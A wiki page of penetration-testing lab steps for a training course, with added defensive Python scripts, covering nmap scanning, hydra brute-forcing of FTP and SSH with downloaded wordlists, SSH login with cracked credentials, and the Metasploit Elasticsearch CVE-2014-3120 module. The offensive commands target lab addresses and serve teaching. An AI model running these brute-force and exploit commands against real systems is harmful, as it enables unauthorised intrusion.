
z‐old Part 2 labs

Dean Bushmiller edited this page Jun 20, 2024 · 1 revision

You must have the lab running.

Scan, Collect & Document: what services are the victims running?

  • Victim IP addresses: 10.0.0.10 & 10.0.0.21 (2)
  • Using Metasploit and Nmap together as a scanner
  • IN KALI
  • @ $
  •   bash
  • this is an insecure shortcut for production systems
  •   sudo -i
  • @ root
  •   msfconsole
  • @ msf6>
  •   db_nmap -sS -A 10.0.0.10-21
  •   services
  • Document
  • IN Artifact repository manually (Google Sheet / YOUR copy and paste)
  • Copy output to the Vulnerabilities 1 tab (still unconfirmed)
  • https://docs.google.com/spreadsheets/d/1PMK589QX5tC9KAMsuoTnR2uVhEVh8830xJNC0N0zdyM/edit?usp=sharing
  • Reformat
  • IN KALI
  • @ msf6>
  •   exit
  • !!!done!!!
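The "Document" and "Reformat" steps above are copy-and-paste work. As an added example (not part of the lab page or of Metasploit), the script below turns nmap's XML output into the rows the Vulnerabilities 1 tab needs. It assumes the scan was also written as XML, e.g. `db_nmap -sS -A -oX scan.xml 10.0.0.10-21` (db_nmap passes extra arguments through to nmap); the XML embedded here is a constructed sample in nmap's schema, not real scan output, and only open ports are kept since those are what goes on the unconfirmed list.

```python
"""Turn nmap XML output into rows for the 'Vulnerabilities 1' sheet.

Added example, not part of the lab page. Assumes an XML scan file such as
one produced by: db_nmap -sS -A -oX scan.xml 10.0.0.10-21
"""
import csv
import io
import xml.etree.ElementTree as ET

# Constructed sample in nmap's XML schema; hosts, ports and versions are made up
# to mirror the lab's two victims, they are not real scan output.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -A -oX scan.xml 10.0.0.10-21">
  <host><status state="up"/>
    <address addr="10.0.0.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="ProFTPD" version="1.3.5"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="23"><state state="filtered"/>
        <service name="telnet"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.21" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="9200"><state state="open"/>
        <service name="wap-wsp"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per OPEN port: host, port, proto, service, product, version."""
    rows = []
    root = ET.fromstring(xml_text)
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue  # skip hosts without an IPv4 address (e.g. MAC-only entries)
        ip = addr.get("addr")
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # filtered/closed ports do not go on the unconfirmed list
            svc = port.find("service")
            rows.append({
                "host": ip,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
    return rows


def to_csv(rows):
    """Render the rows as CSV text, ready to paste into the sheet."""
    buf = io.StringIO()
    fields = ["host", "port", "proto", "service", "product", "version"]
    writer = csv.DictWriter(buf, fieldnames=fields)
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    print(to_csv(parse_nmap_xml(SAMPLE_XML)))
```

Replace `SAMPLE_XML` with the contents of your own `scan.xml` to produce the real rows; the version column is what the later vulnerability-search step keys on, so keep it.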

Upload large password lists & the expsec possible-user list

  • IN KALI
  • @ root
  •   apt -y install seclists
  •   seclists -h
  • Upload the expsec possible-user list & custom password list
  • Shortcut: I put a cleaned expsec user list on AWS S3 (this takes planning & process)
  • Using wget & moving into the correct directory
  • IN KALI
  • @ root
  •   wget https://ceh-v11-20220609.s3.amazonaws.com/expsecusers.txt
  •   mv expsecusers.txt /usr/share/seclists/Usernames/
  •   wget https://ceh-v11-20220609.s3.amazonaws.com/expsec-passwords.txt
  •   mv expsec-passwords.txt /usr/share/seclists/Passwords/
  • !!!done!!!

Password guessing against 2 targets running FTP & SSH

  • Using hydra
  • From the scan: ports 21 & 22 are open on .10 & .21
  • From seclists we have multiple lists (one real but short, one fake because the lab can't take 122 hrs)
  • make the 2 target lists by echoing data into a file
  • IN KALI
  • @ root
  •   echo '10.0.0.10:21' >> targetsFTP.txt
  •   echo '10.0.0.21:21' >> targetsFTP.txt
  •   echo '10.0.0.10:22' >> targetsSSH.txt && echo '10.0.0.21:22' >> targetsSSH.txt
  • verify your file contents
  •   cat targetsFTP.txt
  •   cat targetsSSH.txt
  • verify that you are in /usr/share/seclists (the 2 target files above must be there, since the list paths below are relative)
  •   ls
  • execute the password attack
  •   hydra -L ./Usernames/expsecusers.txt -P ./Passwords/expsec-passwords.txt -M targetsFTP.txt ftp
  •   hydra -L ./Usernames/expsecusers.txt -P ./Passwords/expsec-passwords.txt -M targetsSSH.txt ssh
  • Who do we get?
  • Document
  • IN Artifact repository manually (Google Sheet / your copy and paste)
  • Copy output to the Vulnerabilities 1 tab (still unconfirmed)
  • Reformat
  • !!!done!!!
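The hydra run above is exactly the pattern a victim's auth logs should make visible: many failed logins from one source in a short window, sometimes followed by a success. As an added example (not from the lab page or from hydra), the detector below runs that check over log lines. The lines are constructed samples in Linux sshd and vsftpd syslog format; the lab's Windows victim logs differently, so the regexes, the threshold and the 60-second window are assumptions to adjust for your own logs.

```python
"""Flag password-guessing bursts against SSH and FTP from auth-log lines.

Added defender-side example, not part of the lab page. Log format, threshold
and window are assumptions; the sample lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.0.0.5 hammers sshd and vsftpd and then gets in;
# 10.0.0.77 is a single benign failure that must NOT be flagged.
SAMPLE_LOG = """\
Jun 20 10:15:01 victim sshd[2201]: Failed password for boba_fett from 10.0.0.5 port 51234 ssh2
Jun 20 10:15:01 victim sshd[2202]: Failed password for invalid user jango from 10.0.0.5 port 51235 ssh2
Jun 20 10:15:02 victim sshd[2203]: Failed password for boba_fett from 10.0.0.5 port 51236 ssh2
Jun 20 10:15:02 victim vsftpd[2310]: pam_unix(vsftpd:auth): authentication failure; logname= uid=0 euid=0 tty=ftp ruser=boba_fett rhost=10.0.0.5
Jun 20 10:15:03 victim sshd[2204]: Failed password for boba_fett from 10.0.0.5 port 51237 ssh2
Jun 20 10:15:03 victim sshd[2205]: Accepted password for boba_fett from 10.0.0.5 port 51238 ssh2
Jun 20 10:20:00 victim sshd[2250]: Failed password for admin from 10.0.0.77 port 40001 ssh2
"""

# One regex for both failure shapes: sshd "Failed password" and vsftpd via pam_unix.
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ (?P<svc>sshd|vsftpd)\[\d+\]: "
    r"(?:Failed password for (?:invalid user )?(?P<user1>\S+) from (?P<ip1>\S+)"
    r"|pam_unix\(vsftpd:auth\): authentication failure;.*ruser=(?P<user2>\S*) rhost=(?P<ip2>\S+))"
)
OK_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Accepted password for (?P<user>\S+) from (?P<ip>\S+)"
)


def parse_ts(text):
    # syslog timestamps carry no year; assume every line is from the same year
    return datetime.strptime(text, "%b %d %H:%M:%S")


def find_bursts(log_text, threshold=4, window=timedelta(seconds=60)):
    """Return {ip: summary} for every source with >= threshold failed logins
    inside any window-long span. summary["success_after"] is True when the same
    source later logged in successfully: the guess most likely worked."""
    failures = defaultdict(list)   # ip -> [(ts, user, service)]
    successes = defaultdict(list)  # ip -> [(ts, user)]
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            user = m.group("user1") or m.group("user2") or ""
            ip = m.group("ip1") or m.group("ip2")
            failures[ip].append((parse_ts(m.group("ts")), user, m.group("svc")))
            continue
        m = OK_RE.match(line)
        if m:
            successes[m.group("ip")].append((parse_ts(m.group("ts")), m.group("user")))

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):           # sliding window over failure times
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_start = events[start][0]
                alerts[ip] = {
                    "failures": len(events),
                    "users": {u for _, u, _ in events},
                    "services": {s for _, _, s in events},
                    "success_after": any(ts >= burst_start for ts, _ in successes.get(ip, [])),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in find_bursts(SAMPLE_LOG).items():
        print(ip, info)
```

The `success_after` flag is the one to page on: a burst alone is noise on any internet-facing host, while a burst followed by an accepted login from the same source is the "who do we get?" answer seen from the other side.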

Vulnerability search: for the three found

  • ProFTPD 1.3.5
  • Oracle GlassFish Application Server
  • wap-wsp / port 9200
  • (for the last one, Google: what is wap-wsp / port 9200)
  • Research using both:
  • https://nvd.nist.gov/vuln/search
  • https://www.exploit-db.com/
  • Document
  • IN Artifact repository manually (Google Sheet / your copy and paste)
  • Pretend you have all three of these in your organization
  • Which is worse and why?
  • !!!done!!!

Exploit

  • We have SSH, so we could do anything. But we are not going to.
  • Start an SSH session and escalate privileges.
  • IN KALI
  • @ root
  •   ssh 10.0.0.21 -l boba_fett
  • Supply the password from your Artifact sheet
  •   CTRL Z
  • You now have a remote shell on the Windows victim (it will NOT act like your Kali terminal)
  • What you can do depends on your Microsoft administrator skills.
  • Exploit port 9200
  • IN KALI
  • @ msf6>
  • ? what services have we captured
  •   services
  • ? use exploit (CVE-2014-3120)
  • I am not giving you the settings for set (you must think and apply what you have learned)
  •   use exploit/multi/elasticsearch/script_mvel_rce
  •   set RHOST
  •   set LHOST
  •   set RPORT
  •   set LPORT 4444
  • normally we set PAYLOAD, but here we are only trying to verify the exploit
  •   run
  • returned message: Exploit completed, but no session was created.
  • !!!done!!!
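The module above exists because of one server setting. As an added defender-side example (not from the lab page or from Metasploit), the script below audits an `elasticsearch.yml` for it. It assumes the port-9200 service is Elasticsearch 1.x, where dynamic MVEL scripting is governed by `script.disable_dynamic` and the fix for CVE-2014-3120 is to set it to `true` (Elasticsearch made that the default from 1.2.0). The two config snippets are constructed, the flat key/value parser is an assumption good enough for that file's usual shape, and the version default logic is what turns "key absent" into a finding on an old node.

```python
"""Audit elasticsearch.yml for the setting behind CVE-2014-3120 (dynamic scripting).

Added defender-side example, not part of the lab page. Assumes Elasticsearch 1.x;
the config snippets are constructed and the parser handles only flat key: value lines.
"""

WEAK_CONFIG = """\
# constructed: a node exposed to the lab network with scripting left on
cluster.name: lab-es
network.host: 0.0.0.0
script.disable_dynamic: false
"""

HARDENED_CONFIG = """\
# constructed: same node with dynamic scripting off and bound to loopback
cluster.name: lab-es
network.host: 127.0.0.1
script.disable_dynamic: true
"""


def parse_simple_yaml(text):
    """Flat `key: value` parser (assumption: no nested blocks or lists; a real
    file with those needs a YAML library). Comments and blank lines are skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        settings[key.strip()] = value.strip().strip("\"'")
    return settings


def audit_elasticsearch(text, version=(1, 1, 0)):
    """Audit a flat elasticsearch.yml. `version` is the node's ES version tuple;
    it matters because the default for script.disable_dynamic flipped in 1.2.0."""
    s = parse_simple_yaml(text)
    raw = s.get("script.disable_dynamic")
    if raw is None:
        dynamic_on = version < (1, 2, 0)    # key absent: pre-1.2 default is ENABLED
    else:
        dynamic_on = raw.lower() != "true"  # only an explicit true turns it off
    all_ifaces = s.get("network.host") == "0.0.0.0"

    findings = []
    if dynamic_on:
        findings.append("dynamic scripting enabled (CVE-2014-3120 class): "
                        "set script.disable_dynamic: true")
    if all_ifaces:
        findings.append("REST port 9200 bound to all interfaces: "
                        "set network.host to a trusted address")
    return {"dynamic_scripting": dynamic_on,
            "bound_to_all_interfaces": all_ifaces,
            "findings": findings}


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_elasticsearch(cfg)["findings"])
```

Run it against the victim's real `elasticsearch.yml` after the lab: the "no session was created" result above says nothing about whether the setting is safe, only that this run did not land a shell.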

Repeat this 300 times and you have a full penetration test.

SHUT DOWN ALL MACHINES IF YOU ARE WILLING TO KEEP PAYING AND RESTART THE LAB LATER

DELETE THE CLOUDFORMATION STACK & DELETE THE AMIs TO STOP PAYING